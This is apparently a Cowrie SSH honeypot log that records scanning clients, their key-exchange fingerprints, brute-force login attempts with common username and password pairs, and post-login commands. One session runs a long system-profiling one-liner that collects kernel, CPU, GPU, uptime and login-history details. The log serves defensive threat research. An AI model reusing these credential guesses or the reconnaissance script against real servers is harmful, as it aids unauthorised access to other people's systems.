{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:20:34.216176Z","src_ip":"212.227.125.160","session":"94e0e91e3868"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59370,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3948c7e81b7","protocol":"ssh","message":"New connection: 212.227.235.229:59370 (1.2.3.4:22) [session: c3948c7e81b7]","sensor":"my-vps","timestamp":"2025-08-31T05:20:34.308555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:20:34.309508Z","src_ip":"212.227.235.229","session":"c3948c7e81b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:20:34.392053Z","src_ip":"212.227.235.229","session":"c3948c7e81b7"}
{"eventid":"cowrie.login.failed","username":"1","password":"123456","message":"login attempt [1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:20:34.765126Z","src_ip":"212.227.235.229","session":"c3948c7e81b7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:20:35.850322Z","src_ip":"212.227.235.229","session":"c3948c7e81b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55230,"dst_ip":"1.2.3.4","dst_port":22,"session":"347de51d6ccc","protocol":"ssh","message":"New connection: 212.227.125.160:55230 (1.2.3.4:22) [session: 347de51d6ccc]","sensor":"my-vps","timestamp":"2025-08-31T05:20:36.906990Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Louise1","message":"login attempt [root/Louise1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:20:36.954730Z","src_ip":"79.127.48.196","session":"c3a50e94f1fc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:20:37.297738Z","src_ip":"212.227.125.160","session":"347de51d6ccc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:20:37.321324Z","src_ip":"212.227.125.160","session":"347de51d6ccc"}
{"eventid":"cowrie.login.failed","username":"test","password":"12345678","message":"login attempt [test/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:20:39.904854Z","src_ip":"212.227.125.160","session":"347de51d6ccc"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:20:41.494326Z","src_ip":"212.227.125.160","session":"347de51d6ccc"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:20:47.929374Z","src_ip":"212.227.125.160","session":"94e0e91e3868"}
{"eventid":"cowrie.session.closed","duration":"23.9","message":"Connection lost after 23.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:20:50.251894Z","src_ip":"212.227.125.160","session":"94e0e91e3868"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54242,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc7d3163b17b","protocol":"ssh","message":"New connection: 212.227.235.229:54242 (1.2.3.4:22) [session: fc7d3163b17b]","sensor":"my-vps","timestamp":"2025-08-31T05:20:51.982025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:20:53.027518Z","src_ip":"212.227.235.229","session":"fc7d3163b17b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:20:53.028201Z","src_ip":"212.227.235.229","session":"fc7d3163b17b"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:21:02.221434Z","src_ip":"212.227.235.229","session":"fc7d3163b17b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:21:02.895884Z","src_ip":"79.127.48.196","session":"c3a50e94f1fc"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T05:21:02.896565Z","src_ip":"79.127.48.196","session":"c3a50e94f1fc"}
{"eventid":"cowrie.session.closed","duration":"14.1","message":"Connection lost after 14.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:06.093402Z","src_ip":"212.227.235.229","session":"fc7d3163b17b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50694,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce594dacd644","protocol":"ssh","message":"New connection: 212.227.235.229:50694 (1.2.3.4:22) [session: ce594dacd644]","sensor":"my-vps","timestamp":"2025-08-31T05:21:08.136187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:21:08.144751Z","src_ip":"212.227.235.229","session":"ce594dacd644"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:21:08.392778Z","src_ip":"212.227.235.229","session":"ce594dacd644"}
{"eventid":"cowrie.login.failed","username":"ts3server","password":"1234","message":"login attempt [ts3server/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T05:21:09.400640Z","src_ip":"212.227.235.229","session":"ce594dacd644"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:10.652791Z","src_ip":"212.227.235.229","session":"ce594dacd644"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"11.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:21:14.139984Z","src_ip":"79.127.48.196","session":"c3a50e94f1fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44132,"dst_ip":"1.2.3.4","dst_port":22,"session":"13c02d5fcd03","protocol":"ssh","message":"New connection: 212.227.235.229:44132 (1.2.3.4:22) [session: 13c02d5fcd03]","sensor":"my-vps","timestamp":"2025-08-31T05:21:14.221654Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48812,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f2e93a55688","protocol":"ssh","message":"New connection: 212.227.125.160:48812 (1.2.3.4:22) [session: 6f2e93a55688]","sensor":"my-vps","timestamp":"2025-08-31T05:21:14.555418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:21:14.914099Z","src_ip":"212.227.235.229","session":"13c02d5fcd03"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:21:14.914831Z","src_ip":"212.227.235.229","session":"13c02d5fcd03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32982,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea6175ed7e8d","protocol":"ssh","message":"New connection: 212.227.235.229:32982 (1.2.3.4:22) [session: ea6175ed7e8d]","sensor":"my-vps","timestamp":"2025-08-31T05:21:17.061254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:21:17.165171Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:21:17.867866Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:21:18.473436Z","src_ip":"212.227.125.160","session":"6f2e93a55688"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:21:18.551227Z","src_ip":"212.227.125.160","session":"6f2e93a55688"}
{"eventid":"cowrie.login.success","username":"root","password":"12","message":"login attempt [root/12] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.176820Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:21:20.613131Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.613870Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.614471Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.615429Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.616865Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.617895Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.619079Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.620835Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.621978Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:21:20.622855Z","src_ip":"212.227.235.229","session":"ea6175ed7e8d"}
